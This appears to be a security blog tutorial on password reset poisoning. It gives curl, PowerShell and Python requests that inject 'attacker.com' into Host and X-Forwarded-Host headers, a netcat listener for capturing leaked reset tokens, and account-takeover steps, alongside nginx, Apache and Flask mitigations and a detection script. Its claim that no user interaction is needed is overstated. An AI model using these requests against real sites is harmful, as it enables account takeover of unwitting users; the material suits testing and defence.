
Introduction
Password reset poisoning is a subtle yet critical web application vulnerability in which an attacker manipulates the `Host` header of a password reset or email verification request. By injecting a domain they control, the attacker causes the application to generate a reset link pointing at their own server, which leaks the secret token and enables full account takeover. The technique exploits the trust that web applications place in the `Host` header when constructing dynamic links, and it frequently leads to severe breaches if left unchecked.
Learning Objectives
- Understand the mechanics of password reset poisoning and host header injection.
- Learn to identify, test, and exploit host header manipulation vulnerabilities using Burp Suite and command-line tools.
- Implement robust server-side mitigation strategies to protect against token leakage and account takeover.
You Should Know
1. Understanding Password Reset Poisoning
Password reset poisoning occurs when an application uses the `Host` header value to generate links in password reset or email verification emails. If an attacker can modify this header—via techniques like header injection or duplicate headers—the resulting link will point to a domain they control. When the victim clicks the link, the reset token is sent to the attacker’s server, allowing them to reset the victim’s password and take over the account. This attack does not require user interaction beyond receiving the email; the token is leaked when the email client loads the poisoned link (e.g., as an image or via a tracking pixel).
Key components:
- Host header: Used by servers to determine the target host.
- Reset token: A secret value embedded in the URL that grants password reset privileges.
- Attacker-controlled domain: Where the token is logged or captured.
2. Setting Up Burp Suite for Interception
Burp Suite is the industry-standard tool for testing web vulnerabilities. To begin testing for password reset poisoning:
- Configure your browser to route traffic through Burp Proxy (usually `127.0.0.1:8080`).
- Install Burp’s CA certificate to intercept HTTPS traffic seamlessly.
- Enable Intercept in the Proxy tab to capture requests.
Step‑by‑step guide:
- Navigate to the target application’s password reset or email verification page.
- Submit a legitimate email address and intercept the request before it reaches the server.
- Observe the raw HTTP request, focusing on the `Host` header.
Linux/Windows command equivalent (for non‑GUI testing):
# Using curl to send a crafted request
curl -X POST https://target.com/reset-password \
  -H "Host: attacker.com" \
  -d "[email protected]"
On Windows (PowerShell):
Invoke-WebRequest -Uri "https://target.com/reset-password" `
-Method POST `
-Headers @{ "Host" = "attacker.com" } `
-Body "[email protected]"
3. Manipulating Host Headers – The Core Technique
The attacker’s goal is to poison the reset link by altering the `Host` header. Common injection methods include:
- Single header override: Replace `Host: target.com` with `Host: attacker.com`.
- X-Forwarded-Host injection: Some applications trust this proxy header. Add `X-Forwarded-Host: attacker.com`.
- X-Forwarded-For injection: Occasionally misused for host generation. Try `X-Forwarded-For: attacker.com`.
- Duplicate Host headers: Some servers use the first occurrence, others the last. Send both:
Host: target.com
Host: attacker.com
Step‑by‑step guide using Burp:
1. Intercept the password reset request.
2. Right-click the request and select Send to Repeater.
3. In Repeater, modify the `Host` header as described above.
4. Send the request and monitor your test email inbox.
5. If the email contains a link like `https://attacker.com/reset?token=abc123`, the attack is successful.
Automated testing with curl:
curl -H "Host: attacker.com" -H "X-Forwarded-Host: attacker.com" \
  -X POST https://target.com/reset-password -d "[email protected]"
4. Exploiting Email Verification and Password Reset Flows
Once you’ve confirmed that the host header influences link generation, you can proceed to full exploitation.
Step‑by‑step guide:
- Craft the malicious request with your chosen header injection.
- Send the request and wait for the victim to receive the email.
- Capture the token by monitoring your server logs (e.g., with `netcat` or a simple HTTP server).
# Start a listener on port 80 (a privileged port, hence sudo)
sudo nc -lvnp 80
# Or use Python's built-in HTTP server, which logs every request it receives
python3 -m http.server 80
- Once the token is leaked, visit the legitimate reset URL but replace the token with the stolen one.
- Set a new password and take over the account.
Note: This attack can succeed even if the victim never clicks, because email clients that pre‑fetch links (e.g., Outlook’s safe link feature) request the poisoned URL themselves, and the attacker’s server logs the token.
5. Detection and Mitigation – Secure Your Applications
Developers must implement proper host header validation to prevent poisoning.
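On the detection side, here is an added example (not the post's code) that scans web server access logs for reset-flow requests whose `Host` or `X-Forwarded-Host` value is outside the allowlist, which is exactly the condition the server rules in this section reject. It assumes a custom nginx `log_format` that records `$host` and `$http_x_forwarded_host`; the log lines and domain names are constructed.

```python
# Added detection example (not the post's code). Assumes this custom
# nginx log_format (not the default "combined" format):
#   $remote_addr [$time_local] "$request" $status "$host" "$http_x_forwarded_host"
import re

ALLOWED_HOSTS = {"yourdomain.com", "www.yourdomain.com"}   # assumed allowlist
RESET_PATHS = ("/reset-password", "/verify-email")         # assumed endpoints

# Constructed sample lines: one legitimate request, one rejected by the
# nginx 444 rule, one that slipped a proxy header past a trusting app,
# and one unrelated endpoint that should be ignored.
SAMPLE_LOG = """\
203.0.113.5 [10/Oct/2024:12:00:01 +0000] "POST /reset-password HTTP/1.1" 200 "yourdomain.com" "-"
203.0.113.9 [10/Oct/2024:12:00:07 +0000] "POST /reset-password HTTP/1.1" 444 "attacker.com" "-"
203.0.113.9 [10/Oct/2024:12:00:09 +0000] "POST /reset-password HTTP/1.1" 200 "yourdomain.com" "attacker.com"
198.51.100.2 [10/Oct/2024:12:01:00 +0000] "GET /login HTTP/1.1" 200 "attacker.com" "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) "(?P<host>[^"]*)" "(?P<xfh>[^"]*)"$'
)


def find_poisoning_attempts(log_text):
    """Return (client_ip, path, reason) for every reset-flow request whose
    Host is not allowlisted or that carries any X-Forwarded-Host value.
    Requests to other endpoints are out of scope for this check."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m["path"].split("?")[0].startswith(RESET_PATHS):
            continue
        host = m["host"].split(":")[0].lower()      # ignore an explicit port
        if host not in ALLOWED_HOSTS:
            findings.append((m["ip"], m["path"], f"Host={m['host']}"))
        elif m["xfh"] != "-":
            findings.append((m["ip"], m["path"], f"X-Forwarded-Host={m['xfh']}"))
    return findings


if __name__ == "__main__":
    for ip, path, reason in find_poisoning_attempts(SAMPLE_LOG):
        print(f"{ip} {path} {reason}")
```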
Mitigation strategies:
- Use a static, absolute URL for reset links instead of dynamically building from the `Host` header.
- Validate the `Host` header against a whitelist of allowed domains.
- Avoid using `X-Forwarded-Host` unless behind a trusted proxy; if used, ensure it is stripped at the edge.
- Set the `Host` header to a canonical value in your server configuration (e.g., `nginx` or Apache).
Example nginx configuration to enforce a valid host:
server {
    listen 80;
    server_name yourdomain.com www.yourdomain.com;
    # Close the connection without a response (444) for any request whose
    # Host header is not one of the expected domains. The dots are escaped so
    # the regular expression matches them literally.
    if ($host !~ ^(yourdomain\.com|www\.yourdomain\.com)$ ) {
        return 444;
    }
    ... rest of config
}
Apache example:
<VirtualHost *:80>
    ServerName yourdomain.com
    <IfModule mod_rewrite.c>
        RewriteEngine On
        # Reject (403 Forbidden) any request whose Host header is not the canonical name
        RewriteCond %{HTTP_HOST} !^yourdomain\.com$ [NC]
        RewriteRule ^ - [F]
    </IfModule>
</VirtualHost>
Framework‑level fix (Python/Flask):
from flask import Flask, request, abort

app = Flask(__name__)

@app.before_request
def validate_host():
    # Reject any request whose Host header is not an expected domain before
    # any view (including the password reset handler) runs
    allowed_hosts = ['yourdomain.com']
    if request.host not in allowed_hosts:
        abort(400)
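To make the mechanics of sections 1 and 5 concrete, here is an added example (not the post's code and not tied to any framework): the link-building pattern that trusts `Host`/`X-Forwarded-Host`, beside the hardened version that uses a static absolute URL and an allowlist. The domain names and the header-list representation of a request are assumptions.

```python
# Added example (not the post's code). `headers` stands in for a parsed
# request's header list as (name, value) pairs, so duplicate Host headers
# and proxy headers can be represented exactly as the post describes.
import secrets
from urllib.parse import urlencode

CANONICAL_BASE = "https://yourdomain.com"                  # assumed canonical origin
ALLOWED_HOSTS = {"yourdomain.com", "www.yourdomain.com"}   # assumed allowlist


def build_reset_link_vulnerable(headers, token):
    """The poisonable pattern: X-Forwarded-Host wins if present, otherwise
    the *last* Host header (other servers take the first). Either way the
    client decides which domain the token is delivered to."""
    forwarded = [v for k, v in headers if k.lower() == "x-forwarded-host"]
    hosts = [v for k, v in headers if k.lower() == "host"]
    host = forwarded[-1] if forwarded else hosts[-1]
    return f"https://{host}/reset?{urlencode({'token': token})}"


def build_reset_link_safe(headers, token):
    """Hardened: the link is built from a static absolute URL, the Host
    header must match the allowlist exactly once, and X-Forwarded-Host is
    never consulted. A poisoned request gets no token at all."""
    hosts = [v for k, v in headers if k.lower() == "host"]
    if len(hosts) != 1 or hosts[0].lower() not in ALLOWED_HOSTS:
        raise ValueError("rejected: Host header missing, duplicated or not allowlisted")
    return f"{CANONICAL_BASE}/reset?{urlencode({'token': token})}"


def poisoned_request():
    # Constructed headers of the kind section 3 describes (duplicate Host plus proxy header)
    return [("Host", "yourdomain.com"),
            ("Host", "attacker.com"),
            ("X-Forwarded-Host", "attacker.com")]


def legit_request():
    return [("Host", "yourdomain.com")]


if __name__ == "__main__":
    token = secrets.token_urlsafe(32)
    print(build_reset_link_vulnerable(poisoned_request(), token))  # link points at attacker.com
    print(build_reset_link_safe(legit_request(), token))           # link points at yourdomain.com
    try:
        build_reset_link_safe(poisoned_request(), token)
    except ValueError as err:
        print(err)
```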
6. Advanced Attack Variants and Tooling
Beyond simple header swaps, attackers may exploit:
- Header injection via line breaks (CRLF) to add malicious headers.
- Using `X-Original-URL` or `X-Rewrite-URL` in combination with host header attacks.
- Chaining with other vulnerabilities like open redirects.
Testing with custom Python script:
import requests

url = "https://target.com/reset-password"
# Both headers are set so that either a server that reads Host directly or one
# that trusts the proxy header will build the poisoned link
headers = {
    "Host": "attacker.com",
    "X-Forwarded-Host": "attacker.com"
}
data = {"email": "[email protected]"}
# verify=False disables TLS certificate validation for test targets with self-signed certs
response = requests.post(url, headers=headers, data=data, verify=False)
print(f"Status: {response.status_code}")
Windows PowerShell alternative:
$headers = @{ "Host" = "attacker.com"; "X-Forwarded-Host" = "attacker.com" }
$body = @{ email = "[email protected]" }
Invoke-WebRequest -Uri "https://target.com/reset-password" -Method POST -Headers $headers -Body $body
7. Real‑World Examples and Write‑ups
The following resources provide in‑depth case studies:
- Password Reset Poisoning – An In‑Depth Guide
- Account Takeover via Host Header Injection
- Email Verification Poisoning Explained
These write‑ups illustrate how minor misconfigurations can lead to full account compromise and are essential reading for bug bounty hunters and security engineers.
What Undercode Say
- Key Takeaway 1: Password reset poisoning is not a theoretical risk—it’s a prevalent, easy‑to‑exploit vulnerability that directly leads to account takeover.
- Key Takeaway 2: Defending against it requires a shift from relying on dynamic host headers to using absolute URLs and strict server‑side validation.
Analysis: The attack leverages the application’s implicit trust in client‑supplied headers, a common oversight in modern web development. While the concept is simple, its impact is severe: an attacker can silently compromise any user account without triggering alarms. For security professionals, mastering this technique is crucial for both offensive testing and defensive hardening. Organizations must prioritize host header validation in their secure coding guidelines and regularly test for such flaws during penetration tests.
Prediction
As web applications continue to rely on cloud‑hosted services and reverse proxies, the complexity of host header handling will increase. Attackers will evolve their techniques, possibly exploiting CDN misconfigurations or advanced header chaining. We predict a rise in automated scanners that detect host header injection, prompting a cat‑and‑mouse game between developers and hackers. Ultimately, frameworks will adopt secure defaults, but until then, manual testing and awareness remain the best defense.
Reported By: Wadgamaraldeen هذا – Hackers Feeds